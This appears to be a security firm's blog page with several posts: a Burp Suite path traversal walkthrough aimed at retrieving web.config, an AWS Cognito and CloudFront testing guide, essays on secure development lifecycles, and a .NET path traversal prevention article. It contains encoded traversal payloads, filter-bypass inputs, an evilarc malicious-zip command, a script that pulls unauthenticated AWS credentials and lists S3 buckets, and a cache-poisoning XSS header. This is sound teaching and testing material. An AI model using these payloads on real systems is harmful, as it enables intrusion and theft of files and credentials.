Tuesday, March 17, 2020

How to Path Traversal with Burp Community Suite


A well-known, never out of fashion and highly impact vulnerability is the Path Traversal. This technique is also known as dot-dot-slash attack (../) or as a directory traversal, and it consists in exploiting an insufficient security validation/sanitization of user input, which is used by the application to build pathnames to retrieve files or directories from the file system that is located underneath a restricted parent directory.
By manipulating the values through special characters an attacker can cause the pathname to resolve to a location that is outside of the restricted directory.

In OWASP terms, a path traversal attack falls under the category A5 of the top 10 (2017): Broken Access Control, so as one of top 10 issues of 2017 we should give it a special attention.

In this blog post we will explore an example of web.config exfiltration via path traversal using Burp Suite Intruder Tool.

Previous posts about path traversal:
How to prevent Path Traversal in .NET
From Path Traversal to Source Code in Asp.NET MVC Applications

Testing Step-by-Step

First, get a copy of Burp Suite Community Edition, a useful testing tool that provides many automated and semi-automated features to improve security testing performances.
In particular, Burp Intruder feature can be very useful to exploit path traversal vulnerabilities.

Suppose there's a DotNet web application vulnerable to path traversal. In order to exploit the issue the attacker can try to download the whole source code of the application by following this tutorial.

Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it's possible to send it to Burp Intruder as shown in the following screenshot.

On the Intruder tab, the target has been set with the request that it will be used to manipulate in order to find the web.config file.

Make sure that the payload is correctly injected in the right attribute position, if not, perform a "Clear §" action, then select the attribute to fuzz and click on "Add §" button. 

To set the payloads that Burp Intruder will use to perform the requests, download  file traversals-8-deep-exotic-encoding.txt  from fuzzdb project  and provide it to Burp Intruder by executing the following actions:
  • go to the "Payloads" sub-tab;
  • select from dropdown list "Payload type" the value "Simple List";
  • in the panel "Payload Options" click on "Load..." button and select the fuzzing path traversal file (as shown in following screenshot).

Next step is to add a Payload Processing rule in order to match and replace the placeholder "{FILE}" with the filename we want to exfiltrate (in our example "web.config"), so click on "Add button".

In the paylod processing rule modal, add the Match for string "{FILE}" and the Replace for string "web.config", as shown in following screenshot:

In order to improve the probability of a successful attack, it is possible to add a Grep-Match value (if known), in order to easily identify a positive response.

Remove all already existing rules:

Then add a new Grep-Match rule for "<configuration>" string, that indicates web.config file has been found.

Finally, it's suggested to tune the Request Engine options basing on web server limitations (anti-throttling, firewall system, etc) in order to avoid false negative results, for example increasing retry delay.

Let's launch the attack. 

If the endpoint will result vulnerable to path traversal, the column "configuration" will be checked.

Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our 3 posts journey discussing the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services related to supporting web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.

AWS Cognito

It provides developers with an authentication, authorization and user management system that can be implemented in web applications and is divided in two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:

A web application will then query AWS Cognito by specifying the proper Identity pool ID in order to get temporary limited-privileged AWS credentials to access other AWS services.

An identity pool also allows to specify a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.

This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the following scenario of a web application that allows access to AWS S3 buckets upon proper authentication with the identity pool that provides temporary access to the bucket.

Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.

In such a situation, an attacker will be able to access the application credentials to AWS.

The following python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.

In the following script, just replace IDENTITY_POOL with the Identity Pool ID identified during the assessment. 

# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import boto3
from botocore.exceptions import ClientError

   # Get access token
   client = boto3.client('cognito-identity', region_name="us-east-2")
   resp =  client.get_id(IdentityPoolId=[IDENTITY_POOL])

   print "\nIdentity ID: %s"%(resp['IdentityId'])
   print "\nRequest ID: %s"%(resp['ResponseMetadata']['RequestId'])
   resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
   secretKey = resp['Credentials']['SecretKey']
   accessKey = resp['Credentials']['AccessKeyId']
   sessionToken = resp['Credentials']['SessionToken']
   print "\nSecretKey: %s"%(secretKey)
   print "\nAccessKey ID: %s"%(accessKey)
   print "\nSessionToken %s"%(sessionToken)

   # Get all buckets names
   s3 = boto3.resource('s3',aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1")
    print "\nBuckets:"
   for b in s3.buckets.all():
       print b.name

except (ClientError, KeyError):
   print "No Unauth"

If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:

Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i


SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF


AWS CloudFront

AWS CloudFront is Amazon's answer to a Content Delivery Network service which purpose is to improving the performances of delivering content from web applications.
The following images depict the basics of how CloudFront work.

The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.

  • The browser requests resource X to the edge location which doesn't have a cached version. 
  • The edge location thus requests resource X to its origin, meaning where the original copy of resource X is stored. (This is decided upon configuring CloudFront for a given domain. )
  • The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. 
  • The edge location receives resource X and stores it in its cache for future use and finally sends it back to the browser. 

This simple caching mechanism can be very helpful when it comes to improve the performances of querying a web application but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications relying on cache for dynamic pages should be aware of the possibility to abuse such caching functionality and deliver malicious content to the users a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request in order to not keep contacting the origin location.
To do so, few parts of an HTTP request are considered to fully identify the request and are called cache keys. Whenever a cache key changes, the caching system will consider it as a different request and, if it doesn't have a cached copy of it, will contact the origin location.
The basic idea behind web applications cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter and, whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.

Let's consider the following simple request taken from James' post:

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />

The value for X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By changing canary with a."><script>alert(1)</script> it's possible to mess with the HTML and generate an alert box.

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to cache the request containing the alert code in the web cache so that it will be served to other users in the future. As it becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute in the set of cache keys and are valuable candidates to perform cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cached keys.


This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies take advantage of instead of having to take care of the entire infrastructure by themselves. However, companies are the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.

Thursday, April 11, 2019

Secure Development Lifecycle: the SDL value evolution. Part 1

Observability and metrics paradox
It is also about observability: ”If a tree falls in a forest and no one is around to hear it, does it make a sound?” …or… What is the return value (in dollars number) of having a better SDL in place if your company wasn’t shaken by cybersecurity incidents? I see a little paradox here, after spending big budget into security you cannot measure the returns, even more, the returns are less visible: you don’t have incidents in the first place…and if they happen then “someone saves you”, you may have prevented 9/10 of incidents but it is difficult to make a counterfactual argument at that point.
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, Microsoft did.

From: https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf
Microsoft case teaches
Microsoft had a nice market position and did deal with security in the early 2000s. Not any company has a de facto monopoly in the market. Your company has competitors and alternatives, needs reputation…and let’s not dig too deep into cyber-fines scenarios.
MS in the early 2000’s put great efforts in defining and in applying SDL and still nowadays MS SDL is the reference implementation. That was the genesis of SDL as we know it today, practices like STRIDE Threat Modeling are de-facto standards in the industry.
Fortunately, the metrics paradox is getting weakened by the fact that SDL is becoming a value in itself, that can be shown, that completes quality, that enhances reputation, marketing and it is content more than form (not only compliance), we’ll see how security principles are taken over formal compliance checklists.
Dear <big tech firm here>, can I evaluate your Secure Development Lifecycle?
Supply chain customers start to demand secure process itself, not only secure products and certifications (assuming it is even plausible). An example is the case of UK Gov relation with Huawei, but I’m confident others will follow. The next extract is from Huawei cyber security evaluation centre oversight board: annual report 2019 
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”
Not many companies with some complexity and history could quietly survive a similar analysis.
Principles based practices and cyber-environmentally safety requirement
The security demand cannot be met only by compliance requirements, compliance, in its various forms (PCI, ISOXXXX) is still a necessary “sine qua non” condition, but customers and counterparties demand more substance behind that. We can observe this “substance winning over form” for example in GDPR as a principles based regulation, as well as in the demand for security processes results to key vendors (see Huawei report from cybersecurity government agency).
From Wikipedia, GDPR: “Controllers of personal data must put in placeappropriate technical and organisational measures to implement the data protection principles
With that clear in mind, it doesn’t take too long to forecast that an enterprise investing in security principles and substantial SDL will have a double advantage, the genesis/primordial one: more secure product (e.g. MS 2002) but also the newer one coming for the visibility, that customers demand now more and more.
SDL was a means to have more secure product, today even more, is becoming a company “value” and something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company is in the supply chain (hardware, operative system, authentication server, payment gateway, dev frameworks) the more it should care as the biggest is the damage they can do to the information technology environment. Latests year’s Spectre, Heartbleed, EternalBlue, BIOS and software update security incidents are just a few examples of polluting the supply chain.
Metrics transformation; lead vs lag indicators
Take this example of metrics
“the percentage of people wearing hard hats on a building site is a leading safety indicator. A lagging indicator is an output measurement, for example; the number of accidents on a building site is a lagging safety indicator.”
From: https://www.intrafocus.com/lead-and-lag-indicators/
As the security development practices evolve, the same should happens to related metrics. Formal compliance frameworks and lack of severe incidents may have been enough in the past, but neither happens before software development itself. On the other hand, leading indicators are measured during the SDL; leading efforts could be measured in both resources expenditures and assessing maturity level, better both.
After all, would you trust a nuclear power plant just because is law compliant and had no incidents in the last 10 years even IF they don’t spend a buck in security? Let’s put it this way: consider that our planes and power plants use a lot of software, as well as our future medical operation machine, human and self driving cars etc… and I want to see organizations passionately investing in security, in the smartest, and more efficient way, please!
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.

Secure Development Lifecycle: the SDL value evolution. Part 2

Evolution of SDL practices: from custom to product to service
The increasing visibility trend discussed in Part 1, of course, is impacting the current cybersecurity practices, in terms of maturity of evolution, also toward a “service”.
Organisations consist of value chains that are comprised of components that are evolving from genesis to more of a commodity. It sounds fairly basic stuff but it has profound effects because that journey of evolution involves changing characteristics.
Following is a Wardley Map (product evolution/visibility graph) comparing Penetration Testing (PT, more a reacting activity) and SDL (preventing vulnerabilities):

The previous example is a comparison over time (name it: 10 years) of one of the most common practice in cybersecurity. Penetration Testing (PT) went form a custom made exercise, to a product and shifting to a commodity (as a service PT, crow found style bug bounty, etc…) whether the ‘Prevent’ activity: SDL, is gaining the shape of a product and finally more visibility that, by the way, means money.
Pushing security left in the lifecycle, but also pushing up in visibility

from: https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95

Pushing left like a Boss series explains it very well: how to prevent better, but the map of the evolution of the SDL shows also the point discussed in Part 1 of the article: the visibility value on having an SDL.
The birth of a new language is the result (for some the cause) of this “pushing left”. DevSecOps is nowadays term to express this fact. “Threat Model” is another term gaining traction.
DevSecOps imply that the “security guys” will be working together with the developers and also that the developer will be more involved in the security practices. I think this is a real advancement in the SDL field, of course, vendors will overload this term with fancy product associations, that is always expected…we know that Dev*Ops is more a principle/value more than a bunch of products.
On the contrary, PenTest (black box testing, often disconnected to the SDL, non automated, single points in time activity link) will have hard times in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? Don’t know this answer. But if you think you need PenTest…most likely you need even more to mature you SDL!
Security says yes!
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is a fertile ground for increasing the maturity of the SDL. Investing in SDL means also more functional products in the short/medium term too, not only more secure and less risky. Of course, the challenge is to transform a legacy product/team to this more integrated approach. Intrinsic problems like lack of specific expertise in the market are still plaguing the cybersecurity and SLD sector. It is also something that cannot be implemented in “few weeks”. Defining a custom plan, called also programme or roadmap, based on maturity models like OWASP SAMM and OWASP 5D, made up of incremental enhancement over time have been successful in several organizations. It may take years but there are not many shortcuts.

Tuesday, October 23, 2018

How to prevent Path Traversal in .NET


A well-known, never out of fashion and highly impact vulnerability is the Path Traversal. This technique is also known as dot-dot-slash attack (../) or as a directory traversal, and it consists in exploiting an insufficient security validation/sanitization of user input, which is used by the application to build pathnames to retrieve files or directories from the file system, by manipulating the values through special characters that allow access to parent files.
In Open Web Application Security Project (OWASP) terms, a path traversal attack falls under the category A5 of the top 10 (2017): Broken Access Control, so as one of top 10 issues of 2017 we should give it a special attention.

Theoretical Concept

Most basic Path Traversal attacks can be made through the use of "../" characters sequence to alter the resource location requested from a URL. Although many web servers protect applications against escaping from the web root, different encodings of "../" sequence can be successfully used to bypass these security filters and to exploit through flawed canonicalization operations and normalization process.

URL Encode :
  • %2e%2e%2f which translates to ../
  • %2e%2e/ which translates to ../
  • ..%2f which translates to ../
  • %2e%2e%5c which translates to ..\
  • ..%255c which translates to ..\
  • ..%u2216 which translates to ..\
Valid Unicode / UTF-8 Encodings :
  • %cc%b7 translates to   ?  (NON-SPACING SHORT SLASH OVERLAY )
  • %cc%b8 translates to    ?  (NON-SPACING LONG SLASH OVERLAY )
  • %e2%81%84 translates to   ?   (FRACTION SLASH)
  • %e2%88%95 translates to   ?   (DIVISION SLASH)
  • %ef%bc%8f translates to  (FULLWIDTH SLASH)
Invalid Unicode / UTF-8 Encodings :
  • %c1%1c translates to /
  • %c0%af translates to \

Practical Attack

Shall we see two attacks example, the first one exploits through an incorrect validation and sanitization of input data which are modified to access not expected resources; the second one exploits through a well-known vulnerability of some unzip libraries which doesn't use secure by default logic, allowing (via symlink) to unzip files in parent directory.

Path Traversal
As we saw in a previous post From Path Traversal to Source Code in Asp.NET MVC Applications, a Path Traversal can lead to catastrophic consequences and that is why we consider this vulnerability as a Medium/High impact.
A request like this:

GET /download_page?id=content.dat HTTP/1.1
Host: example-mvc-application.minded

Can be tampered and exploited using ../ path sequence, and get access to configuration file.

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

HTTP/1.1 200 OK
<?xml version="1.0" encoding="utf-8"?>
  <configSections>    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=, Culture=neutral" requirePermission="false" />

Traversal in Unzip Function
Another exploit through URI normalization abuse is the unzip directory traversal, which can be exploited using a symlink to extract file to parent directories. There are several tools to create malicious zip files, for example Evilarc.
An example of usage can be seen below:
$ python evilarc.py minded.aspx --path inetpub/wwwroot/ --os unix --depth 9 --output-file minded.zip
Creating minded.zip containing ../../../../../../../../../inetpub/wwwroot/minded.aspx
And here is the structure of the resulting zip file:
$ unzip -l minded.zip 
Archive:  minded.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1254  2018-10-15 15:31   ../../../../../../../../../inetpub/wwwroot/minded.aspx
---------                     -------
     1254                     1 file 
Many common zip programs (Winzip, etc) will prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include same protection mechanisms. This year a good list of impacted libraries has been made with Zip Split Disclosuring Project, which collects all projects has been involved in this security leakage.

Vulnerable code

Here we will see some vulnerable code example, which use different approach in order to attempt to fix path traversal, but without succeeding.

Incorrect Path Validation

When we talk about validation we refer to the verification of data being submitted, to be sure that conforms to a rule or set of rules. These could be a simple not-empty check, a complex regular expression, even a whitelist or blacklist checks.
Talking about paths, whitelist and blacklist checks aren't always possible because sometimes the expected items aren't decided before runtime execution, so it may be a good idea using a regular expression, but this must be done carefully, because defining suitable regular expressions may be practically difficult, so this may bring to security leakage.

See the vulnerable example below:
   Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)");   Match match = regex.Match(location);
   if (match.Success){}
If we try to access another file which do not have .dat extension, application will prevent malicious access to the resource, like this:

User input          :   /../web.config
Server validation   :   ../web.config  ->  Fail match regexp!
Built Path          :   \Content\defaultContent.dat

But since the regular expression does not verify if extension is at the latest position of matching string, this check can be exploited by providing fake path which will be ignored during resource retriving, so server does URI normalization that can be abused, like this:

User input          :   index.aspx?Page=fake.dat/../../web.config
Server validation   :   fake.dat/../../web.config  ->  Success match regexp!
Built Path          :   \Content\fake.dat/../../web.config

When server will access the resource, the path will be :\web.config.

Incorrect Path Sanitization

When we talk about sanitization we refer to the manipulation of user input before it begins used in application business logic, so removing, escaping, replacing, parts of  user input in order to avoid a wrong application behavior. Talking about path, a good example of weak sanitization can be the removing of "../" characters sequence.
See the vulnerable example below:

   location = location.Replace(@"..\", ""); //win
This is going to remove the occurrence of "..\" in user input, so when a path traversal is provided, it is transformed and sanitized like this:

User input          :   index.aspx?Page=..\web.config
Server Sanitization :   ..\web.config  ->  web.config
Built Path          :   \Content\web.config 

But if we just change the back-slash ( \ ) with slash( / ), it can be exploited again, because servers usually do URL normalization:

User input          :   index.aspx?Page=../web.config
Server Sanitization :   ../web.config  ->  ../web.config
Built Path          :   \Content\../web.config 

One might be tempted to remove them both, but this isn't a solution because we can again exploit it throgh a double nested dot-dot-slash payload, like this :

User input          :   index.aspx?Page=...\.\web.config
Server Sanitization :   ...\.\web.config  ->  ..\web.config
Built Path          :   \Content\..\web.config 

While first nested "..\" is begin removed, the second one it's ignored and bring to Path Traversal. When the server accesses the resource, the normalized path will be \web.config.

Vulnerable Unzip library

When using a unzip library, you need to be careful because there may be security lackage caused by a vulnerable code, this can be a known or unknown problem in the library.
For example if we have a look to the source of SharpZipLib library on version which was vulnerable to traversal unzip we can see where the problem was:
public string TransformFile(string name)
 if (name != null) {
  name = MakeValidName(name, _replacementChar);
  if (_trimIncomingPaths) {
   name = Path.GetFileName(name);
  // This may exceed windows length restrictions.
  // Combine will throw a PathTooLongException in that case.
  if (_baseDirectory != null) {
   name = Path.Combine(_baseDirectory, name);
 } else {
  name = string.Empty;
 return name;
As can be seen, the basepath is simply concatenated with name of file from compressed archive, the ability to use upper-directory charaters sequence  in name of file compressed is available from zip specific, but since not all developers knows, this usually lead to path traversal issues, thats why security by default should be used in library methods, disallowing traversal path unzipping by default.

How to fix

Obviously the most effective approach is to map resource location using indirect object reference, so avoiding that source (user input) and sink (reading/writing/deleting files or directories) meet allowing exploits. However this is not always a suitable solutions , it could cost development resources or it couldn't be supported within application architecture, or just not be necessary, so in other case we can combine path validation, path sanitization and absolute path check;

The absolute path check means that we are going to verify from the root, if the file we are about to access is what we were expecting. In other words we segregate resources through path canonicalization, so making it absolute before using it in the application business logic. The canonicalization is a process of lossless reduction of user input to its equivalent simplest known form. In C# there is a method called "System.IO.Path.GetFullPath" which gives the canonicalized path, and we just check if starts with an authorized location.
protected string readFile(string location){

   Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)$");   Match match = regex.Match(location);
   if (match.Success){
      if(File.Exists(location) && Path.GetFullPath(location).StartsWith(@"C:\Applications\Documents",StringComparison.OrdinalIgnoreCase))
          using (StreamReader reader = new StreamReader(location))
              return reader.ReadToEnd();
          return "File not found";
       return "File name not valid";

Traversal Uzip

Before use an unzip library must be sure if has been found vulnerable to unzip directory traversal, for example checking on Zip Split Disclosuring Project, on CVE database, or testing it as we have shown.


Shall we try to do summary between approaches.


Reject input which do not respect decided rules

May lead to other security issue, XSS, SQL Injection even log injection


Remove unwanted characters before it begin used from application If not in whitelist may leave some more unexpected characters
Absolute Path Check

Using canonicalization verify the correct file segregation If not validated and sanitizated the user input may lead to other security issue

So since Security is not a static situation, nor a destination to be reached, but rather a continuous process approaching the fix to a path traversal only with a single method can be simplistic and often not resolutive. So absolutely the best way is to use a security-oriented mentality that involves different layers of the development process (you can check out how much this orientation is in your company with the new Minded Security Software Security 5D framework), but speaking from a technical point of view, validation, sanitization and canonicalization are 3 methods that should be complementarily used to minimize security risks.

  • https://www.owasp.org/index.php/Path_Traversal
  • http://cwe.mitre.org/data/definitions/22.html
  • https://www.owasp.org/index.php/File_System#Path_traversal
  • https://unicode-search.net/unicode-namesearch.pl?term=SLASH

Author: Enrico Aleandri